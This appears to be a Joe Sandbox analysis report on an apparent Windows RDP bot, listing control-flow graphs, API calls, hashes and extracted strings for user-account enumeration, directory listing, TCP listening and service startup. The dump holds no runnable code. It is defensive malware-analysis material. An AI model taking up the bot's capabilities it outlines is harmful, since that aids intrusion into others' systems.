7ffe1a52b217 29 API calls 61275->61277 61279 7ffe1a5214c5 10 API calls 61276->61279 61278 7ffe1a52b26c 61277->61278 61291 7ffe1a52aa20 strcmp strcmp strcmp strcmp 61278->61291 61281 7ffe1a52b2b6 61279->61281 61283 7ffe1a52b2a4 61281->61283 61293 7ffe1a52ab8d 6 API calls 61281->61293 61282 7ffe1a52b298 61282->61276 61284 7ffe1a52b29c 61282->61284 61283->61252 61288 7ffe1a5215d5 WSAGetLastError 61287->61288 61289 7ffe1a5215cb 61287->61289 61290 7ffe1a5277a2 6 API calls 61288->61290 61289->61271 61290->61289 61291->61282 61293->61283 61295 7ffe1a52b15a 61294->61295 61296 7ffe1a52b172 61294->61296 61295->61296 61297 7ffe1a52b163 memset 61295->61297 61296->61257 61296->61258 61298 7ffe1a52b17c 61297->61298 61298->61296 61303->61257 61308 7ffe1a521499 WSAGetLastError 61307->61308 61309 7ffe1a52147b 61307->61309 61311 7ffe1a521491 closesocket 61308->61311 61312 7ffe1a5214a6 61308->61312 61310 7ffe1a5277a2 6 API calls 61309->61310 61310->61311 61311->61031 61311->61032 61313 7ffe1a5277a2 6 API calls 61312->61313 61313->61311

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 799 7ffe11506da3-7ffe11506db9 call 7ffe115040d2 802 7ffe1150722a-7ffe1150722e 799->802 803 7ffe11507234-7ffe11507252 GetProcessHeap HeapAlloc 802->803 804 7ffe11506dbe 802->804 805 7ffe11506dc3-7ffe11506dc8 803->805 806 7ffe11507258-7ffe1150726e call 7ffe115040d2 803->806 804->805 807 7ffe11506eb4-7ffe11506eb9 805->807 808 7ffe11506dce-7ffe11506dde LocalAlloc 805->808 806->805 810 7ffe11506de2-7ffe11506de7 807->810 808->810 812 7ffe11506ded-7ffe11506e6b wcsncpy call 7ffe115093ef LookupAccountNameW 810->812 813 7ffe115071a5 810->813 821 7ffe11506e6d-7ffe11506e6f 812->821 822 7ffe11506ebe-7ffe11506eca GetLastError 812->822 814 7ffe115071aa-7ffe115071b5 813->814 816 7ffe115071bb-7ffe115071bd 814->816 817 7ffe11507273 814->817 816->817 820 7ffe115071c3-7ffe11507224 wcslen GetProcessHeap HeapAlloc 816->820 819 7ffe11507279-7ffe11507281 817->819 827 7ffe11507288-7ffe11507298 819->827 828 7ffe11507283 NetApiBufferFree 819->828 820->799 820->802 823 7ffe11506e75-7ffe11506e96 GetLastError call 7ffe115040d2 821->823 824 7ffe11507070-7ffe11507088 ConvertSidToStringSidA 821->824 825 7ffe11506ecc-7ffe11506edf call 7ffe115040d2 822->825 826 7ffe11506ee1-7ffe11506ef9 LocalAlloc 822->826 847 7ffe11506e9c 823->847 848 7ffe115070e7-7ffe115070ed 823->848 831 7ffe1150708a-7ffe11507091 824->831 832 7ffe115070c1-7ffe115070e5 GetLastError call 7ffe115040d2 824->832 825->823 833 7ffe11507066 826->833 834 7ffe11506eff-7ffe11506f31 LookupAccountNameW 826->834 835 7ffe115073c3-7ffe115073ca 827->835 836 7ffe1150729e-7ffe115072a0 827->836 828->827 841 7ffe1150716d-7ffe11507172 831->841 842 7ffe11507097-7ffe115070bc call 7ffe115040d2 831->842 832->831 833->824 843 7ffe11506f33-7ffe11506f3c LocalFree 834->843 844 7ffe11506f41-7ffe11506f62 GetLastError call 7ffe115040d2 834->844 839 7ffe115073cc-7ffe115073ce 835->839 840 7ffe11507409-7ffe11507422 call 7ffe115040d2 835->840 836->835 845 7ffe115072a6-7ffe11507310 NetUserEnum 836->845 849 7ffe1150751a-7ffe11507534 call 7ffe115040d2 839->849 850 7ffe115073d4-7ffe115073f1 call 7ffe11506c7f call 7ffe115040d2 839->850 869 7ffe11507424 840->869 870 7ffe11507443-7ffe11507449 840->870 841->814 842->814 843->821 874 7ffe11506f7c-7ffe11506f82 844->874 875 7ffe11506f64 844->875 845->819 853 7ffe11507316-7ffe1150731c 845->853 859 7ffe11507166-7ffe1150716b 847->859 860 7ffe11506ea2-7ffe1150715d 847->860 856 7ffe1150717b-7ffe11507180 848->856 857 7ffe115070f3-7ffe115070f9 848->857 889 7ffe115073f6-7ffe11507408 849->889 850->889 853->819 864 7ffe11507322-7ffe11507356 GetProcessHeap HeapAlloc 853->864 856->814 866 7ffe115070fb-7ffe11507101 857->866 867 7ffe11507125-7ffe11507128 857->867 859->814 860->814 872 7ffe1150735c-7ffe11507366 864->872 873 7ffe11506d83-7ffe11506d9e call 7ffe115040d2 864->873 878 7ffe11507197-7ffe1150719c 866->878 879 7ffe11507107-7ffe1150710d 866->879 883 7ffe1150713b-7ffe11507141 867->883 884 7ffe1150712a-7ffe1150712d 867->884 887 7ffe1150742a-7ffe11507437 869->887 888 7ffe115074c8-7ffe115074cd 869->888 876 7ffe115074d2 870->876 877 7ffe1150744f 870->877 890 7ffe11507368-7ffe1150739b memcpy GetProcessHeap HeapFree 872->890 891 7ffe115073a1-7ffe115073be 872->891 873->819 880 7ffe1150702a-7ffe1150702f 874->880 881 7ffe11506f88-7ffe11506f8e 874->881 892 7ffe11506f6a-7ffe11506f77 875->892 893 7ffe11507016-7ffe1150701b 875->893 909 7ffe115074dc-7ffe115074e1 876->909 894 7ffe11507451-7ffe11507457 877->894 895 7ffe1150747f-7ffe11507482 877->895 878->814 897 7ffe11507113-7ffe11507119 879->897 898 7ffe1150719e-7ffe115071a3 879->898 880->843 899 7ffe11506fc4-7ffe11506fca 881->899 900 7ffe11506f90-7ffe11506f93 881->900 903 7ffe11507143-7ffe11507148 883->903 904 7ffe11507190-7ffe11507195 883->904 901 7ffe11507182-7ffe11507187 884->901 902 7ffe1150712f-7ffe11507132 884->902 887->870 888->850 890->891 892->874 893->843 905 7ffe1150745d-7ffe11507463 894->905 906 7ffe115074fa-7ffe115074ff 894->906 907 7ffe11507498-7ffe1150749e 895->907 908 7ffe11507484-7ffe11507487 895->908 910 7ffe1150711b-7ffe11507120 897->910 911 7ffe1150714a-7ffe1150714f 897->911 898->814 916 7ffe11507052-7ffe11507057 899->916 917 7ffe11506fd0-7ffe11506fd6 899->917 912 7ffe11506f95-7ffe11506f98 900->912 913 7ffe11506fae-7ffe11506fb4 900->913 901->814 914 7ffe11507189-7ffe1150718e 902->914 915 7ffe11507134-7ffe11507139 902->915 903->814 904->814 918 7ffe11507469-7ffe1150746f 905->918 919 7ffe11507504-7ffe11507509 905->919 906->850 921 7ffe115074f0 907->921 922 7ffe115074a0-7ffe115074a5 907->922 908->909 920 7ffe11507489-7ffe1150748c 908->920 909->850 910->814 911->814 923 7ffe11507034-7ffe11507039 912->923 924 7ffe11506f9e-7ffe11506fa1 912->924 925 7ffe11506fba-7ffe11506fbf 913->925 926 7ffe11507048-7ffe1150704d 913->926 914->814 915->814 916->843 927 7ffe1150705c-7ffe11507061 917->927 928 7ffe11506fdc-7ffe11506fe2 917->928 929 7ffe11507475-7ffe1150747a 918->929 930 7ffe1150750e-7ffe11507513 918->930 919->850 931 7ffe115074e6-7ffe115074eb 920->931 932 7ffe1150748e-7ffe11507493 920->932 921->906 922->850 923->843 933 7ffe11506fa7-7ffe11506fac 924->933 934 7ffe1150703e-7ffe11507043 924->934 925->843 926->843 927->843 935 7ffe11506fe4-7ffe11506fe9 928->935 936 7ffe11506fee-7ffe11506ff3 928->936 929->850 930->849 930->850 931->850 932->850 933->843 934->843 935->843 936->843
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocErrorLastLocal$AccountCriticalHeapLookupNameSection$CopyEnterFileFreeLeaveProcessfflushfwritewcsncpy
                                                                                                                  • String ID: D$[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x)$[E] (%s) -> ConvertSidToStringSid failed(gle=%lu)$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$sid_to_str$users_sync
                                                                                                                  • API String ID: 3624467404-104752423
                                                                                                                  • Opcode ID: 9aa9ad2c1c237d990a9e3d50bdb71c766015b0657cd4d8b527c9b81fa173bfe5
                                                                                                                  • Instruction ID: 718e88dedde31bd943eb05f96d3132dae591e333a2d1d633c9673e32d2f86b8f
                                                                                                                  • Opcode Fuzzy Hash: 9aa9ad2c1c237d990a9e3d50bdb71c766015b0657cd4d8b527c9b81fa173bfe5
                                                                                                                  • Instruction Fuzzy Hash: 45F1A162A0DE0286FB60CB96E44437D23AAEF84764F2540BAD58D477B8DF7CE885C711
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$ErrorFileLast$CloseFirstNext_mbscpyfflushfwrite
                                                                                                                  • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                                                                                                  • API String ID: 1094913617-1535167640
                                                                                                                  • Opcode ID: 43008a9097aef54c61343347f13780d481088604d2dbe84fe1aabf1f4a312499
                                                                                                                  • Instruction ID: 93f96b002874fb7f547bac6107e8a4654fd89245ca54c358215d82b50c78a052
                                                                                                                  • Opcode Fuzzy Hash: 43008a9097aef54c61343347f13780d481088604d2dbe84fe1aabf1f4a312499
                                                                                                                  • Instruction Fuzzy Hash: 54610875E0C5D389FB60BE94A454BBCA2546F013B8FD40133DCAE9B291DEADA848D361
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                                                                                                                  • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                                                                                                  • API String ID: 4253334766-1535167640
                                                                                                                  • Opcode ID: 19d7847e648ae9034f0efa555709a140e90b851bab03b7f92ee852e7e2957829
                                                                                                                  • Instruction ID: 2fccb24f7821c386b6d476c11bf9cb866100817d59ea4999e9c4f0aa39bd0395
                                                                                                                  • Opcode Fuzzy Hash: 19d7847e648ae9034f0efa555709a140e90b851bab03b7f92ee852e7e2957829
                                                                                                                  • Instruction Fuzzy Hash: FB613A21F0CE4389FB249B96AC043BB2258AF103B5FD451B2E86E5B2F4DE6CF9458741
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$Free$Process$AllocBufferEnumLocalUsermemcpy
                                                                                                                  • String ID: [E] (%s) -> Failed(err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> NetUserEnum failed(enum_err=%08lx)$[I] (%s) -> Done(sam_user_num=%u)$mem_alloc$users_sync
                                                                                                                  • API String ID: 1987963910-3382179125
                                                                                                                  • Opcode ID: 9413801b513f742f34c6a683bec4ac20b7e269b55b5f64348b2d2939899f8447
                                                                                                                  • Instruction ID: c9c3a4d2761c7c3190449f70770ace468e89e56a19a2f246c94831d166e3211e
                                                                                                                  • Opcode Fuzzy Hash: 9413801b513f742f34c6a683bec4ac20b7e269b55b5f64348b2d2939899f8447
                                                                                                                  • Instruction Fuzzy Hash: CE618021A0CE4786FB619B96E8413BD6759AF803B4F2500B9DD8D076B0EF7DE985C301
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$bindfflushfwritehtonlhtonslistensetsockoptsocket
                                                                                                                  • String ID: [E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$tcp_listen
                                                                                                                  • API String ID: 3590747132-3524496754
                                                                                                                  • Opcode ID: 03c5a1b98310e94ddef1aada299942bcfeba41f601d884b0c1ee0b5bb044904e
                                                                                                                  • Instruction ID: 411bc69ec874916818c6e520e04ccc7e5cac15e7efb2ef54dc357032bc706950
                                                                                                                  • Opcode Fuzzy Hash: 03c5a1b98310e94ddef1aada299942bcfeba41f601d884b0c1ee0b5bb044904e
                                                                                                                  • Instruction Fuzzy Hash: 7F31A221A08E0689EF209B27EC102B57691BF587B4F1413B5D9BE436F8EEBCE805C704
                                                                                                                  APIs
                                                                                                                  • strcmp.MSVCRT ref: 00007FF7C1AB1DD4
                                                                                                                  • strcmp.MSVCRT ref: 00007FF7C1AB1DE7
                                                                                                                  • StartServiceCtrlDispatcherA.ADVAPI32 ref: 00007FF7C1AB1E23
                                                                                                                  • _read.MSVCRT ref: 00007FF7C1AB1E79
                                                                                                                  • GetLastError.KERNEL32 ref: 00007FF7C1AB1E98
                                                                                                                    • Part of subcall function 00007FF7C1AB1A63: FreeLibrary.KERNEL32(?,?,00000000,00000157C50713D0,00007FF7C1AB1E50,?,?,?,?,?,?,00000001,00007FF7C1AB1FC3,?,?,00007FF7C1AC8508), ref: 00007FF7C1AB1AA1
                                                                                                                    • Part of subcall function 00007FF7C1AB1A63: GetProcessHeap.KERNEL32(?,?,00000000,00000157C50713D0,00007FF7C1AB1E50,?,?,?,?,?,?,00000001,00007FF7C1AB1FC3,?,?,00007FF7C1AC8508), ref: 00007FF7C1AB1AD4
                                                                                                                    • Part of subcall function 00007FF7C1AB1A63: HeapFree.KERNEL32(?,?,00000000,00000157C50713D0,00007FF7C1AB1E50,?,?,?,?,?,?,00000001,00007FF7C1AB1FC3,?,?,00007FF7C1AC8508), ref: 00007FF7C1AB1AE5
                                                                                                                    • Part of subcall function 00007FF7C1AB1B1C: GetProcessHeap.KERNEL32(?,?,00000000,00007FF7C1AB1E55,?,?,?,?,?,?,00000001,00007FF7C1AB1FC3,?,?,00007FF7C1AC8508,00000000), ref: 00007FF7C1AB1B4D
                                                                                                                    • Part of subcall function 00007FF7C1AB1B1C: HeapFree.KERNEL32(?,?,00000000,00007FF7C1AB1E55,?,?,?,?,?,?,00000001,00007FF7C1AB1FC3,?,?,00007FF7C1AC8508,00000000), ref: 00007FF7C1AB1B5E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$Free$Processstrcmp$CtrlDispatcherErrorLastLibraryServiceStart_read
                                                                                                                  • String ID: RDP-Controller$[E] (%s) -> No a valid run mode(mode=%s)$[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu)$main$service$standalone
                                                                                                                  • API String ID: 3617873859-308889057
                                                                                                                  • Opcode ID: cc0dc7e073174fff5213ad5aad2aa001b37d6c82f68193b81f7804c074e2ded8
                                                                                                                  • Instruction ID: 55dbd16e3c830658aa3537c7ca41d9acc893f87856edf9ec4e123575f4ff44c6
                                                                                                                  • Opcode Fuzzy Hash: cc0dc7e073174fff5213ad5aad2aa001b37d6c82f68193b81f7804c074e2ded8
                                                                                                                  • Instruction Fuzzy Hash: AE51E775A0C68385FB60BF21B490B7DD2919F263A4FD40533DE4E47292EF9DE945C222
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3714283218-0
                                                                                                                  • Opcode ID: a8064edad5975ffa8ddaf6c1b07911e7f079fd9c5a4557f8d4210bda645fea64
                                                                                                                  • Instruction ID: 37f0e2fc44bad5b75d9448d804bfb202b0a22f16963eca52a8324fc8d4c0f541
                                                                                                                  • Opcode Fuzzy Hash: a8064edad5975ffa8ddaf6c1b07911e7f079fd9c5a4557f8d4210bda645fea64
                                                                                                                  • Instruction Fuzzy Hash: 07510775A09A8689EB54FF15F860A7DA2A0BF45BB4F844437CD0E47391DEBDE440C360
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                                                                  • API String ID: 2514157807-65069805
                                                                                                                  • Opcode ID: 435ce618383da7af3460339fe909699e16c0bdc00b3bb9c3a5e4a1d0c95da3f5
                                                                                                                  • Instruction ID: d0048a4ce88e2e493fcae1957da0260c666fb9b61103d9d85128ca9d66e268aa
                                                                                                                  • Opcode Fuzzy Hash: 435ce618383da7af3460339fe909699e16c0bdc00b3bb9c3a5e4a1d0c95da3f5
                                                                                                                  • Instruction Fuzzy Hash: 9B118CA0F1CD0791F71157A7A8902BC1259AF057B8F8017BCED3D9A6F5DE9CA916C300

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 0 7ff7c1ab4fc5-7ff7c1ab4fe1 1 7ff7c1ab5077-7ff7c1ab50a5 call 7ff7c1ab2ef2 0->1 2 7ff7c1ab4fe7-7ff7c1ab4fea 0->2 13 7ff7c1ab5529-7ff7c1ab553a 1->13 3 7ff7c1ab4ff0-7ff7c1ab4ff4 2->3 4 7ff7c1ab50aa-7ff7c1ab50d8 call 7ff7c1ab2ef2 2->4 6 7ff7c1ab5000-7ff7c1ab5015 fopen 3->6 7 7ff7c1ab4ff6-7ff7c1ab4ffa 3->7 4->13 11 7ff7c1ab5110-7ff7c1ab5139 _errno call 7ff7c1ab2ef2 _errno 6->11 12 7ff7c1ab501b-7ff7c1ab5030 fseek 6->12 7->6 10 7ff7c1ab50dd-7ff7c1ab510b call 7ff7c1ab2ef2 7->10 10->13 28 7ff7c1ab517f-7ff7c1ab5193 _errno 11->28 29 7ff7c1ab513b-7ff7c1ab5148 11->29 17 7ff7c1ab5036-7ff7c1ab505f _errno call 7ff7c1ab2ef2 _errno 12->17 18 7ff7c1ab51e3-7ff7c1ab51f0 call 7ff7c1abe438 12->18 19 7ff7c1ab5543-7ff7c1ab5550 13->19 20 7ff7c1ab553c 13->20 33 7ff7c1ab5065-7ff7c1ab5072 17->33 34 7ff7c1ab51ca-7ff7c1ab51de _errno 17->34 36 7ff7c1ab51f2 18->36 37 7ff7c1ab521b-7ff7c1ab5244 _errno call 7ff7c1ab2ef2 _errno 18->37 21 7ff7c1ab5552-7ff7c1ab5563 call 7ff7c1ab2ef2 19->21 22 7ff7c1ab5589-7ff7c1ab5590 19->22 20->19 32 7ff7c1ab5568-7ff7c1ab557a 21->32 22->21 35 7ff7c1ab5518-7ff7c1ab551b 28->35 29->28 33->1 34->35 39 7ff7c1ab5525-7ff7c1ab5527 35->39 40 7ff7c1ab551d-7ff7c1ab5520 fclose 35->40 41 7ff7c1ab5513 36->41 42 7ff7c1ab51f8-7ff7c1ab51fd 36->42 48 7ff7c1ab5246-7ff7c1ab5253 37->48 49 7ff7c1ab528a-7ff7c1ab529e _errno 37->49 39->13 44 7ff7c1ab5592-7ff7c1ab55ab call 7ff7c1ab2ef2 39->44 40->39 41->35 45 7ff7c1ab52a3-7ff7c1ab52bb fseek 42->45 46 7ff7c1ab5203-7ff7c1ab5208 42->46 44->32 51 7ff7c1ab5331-7ff7c1ab535a _errno call 7ff7c1ab2ef2 _errno 45->51 52 7ff7c1ab52bd-7ff7c1ab52c9 45->52 46->45 47 7ff7c1ab520e-7ff7c1ab5216 46->47 47->35 48->49 49->35 61 7ff7c1ab53a0-7ff7c1ab53b4 _errno 51->61 62 7ff7c1ab535c-7ff7c1ab5369 51->62 55 7ff7c1ab52cf-7ff7c1ab52d5 52->55 56 7ff7c1ab53b9-7ff7c1ab53db GetProcessHeap HeapAlloc 52->56 59 7ff7c1ab5582-7ff7c1ab5587 55->59 60 7ff7c1ab52db 55->60 56->55 58 7ff7c1ab53e1-7ff7c1ab53f7 call 7ff7c1ab2ef2 56->58 58->55 59->35 64 7ff7c1ab52e0-7ff7c1ab52ef 60->64 61->35 62->61 66 7ff7c1ab52f5-7ff7c1ab52f7 64->66 67 7ff7c1ab548e-7ff7c1ab5497 64->67 66->67 70 7ff7c1ab52fd-7ff7c1ab5320 fread 66->70 68 7ff7c1ab54bf-7ff7c1ab54e2 call 7ff7c1ab2ef2 67->68 69 7ff7c1ab5499-7ff7c1ab549b 67->69 72 7ff7c1ab549d-7ff7c1ab54a2 68->72 71 7ff7c1ab54e4-7ff7c1ab54e9 69->71 69->72 70->67 74 7ff7c1ab5326 70->74 77 7ff7c1ab54f3-7ff7c1ab54fc 71->77 78 7ff7c1ab54eb-7ff7c1ab54f1 71->78 72->35 75 7ff7c1ab54a4-7ff7c1ab54bd GetProcessHeap HeapFree 72->75 79 7ff7c1ab53fc-7ff7c1ab5425 _errno call 7ff7c1ab2ef2 _errno 74->79 80 7ff7c1ab532c-7ff7c1ab532f 74->80 75->35 77->78 78->35 83 7ff7c1ab5427-7ff7c1ab5434 79->83 84 7ff7c1ab546b-7ff7c1ab547f _errno 79->84 80->64 83->84 84->64
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
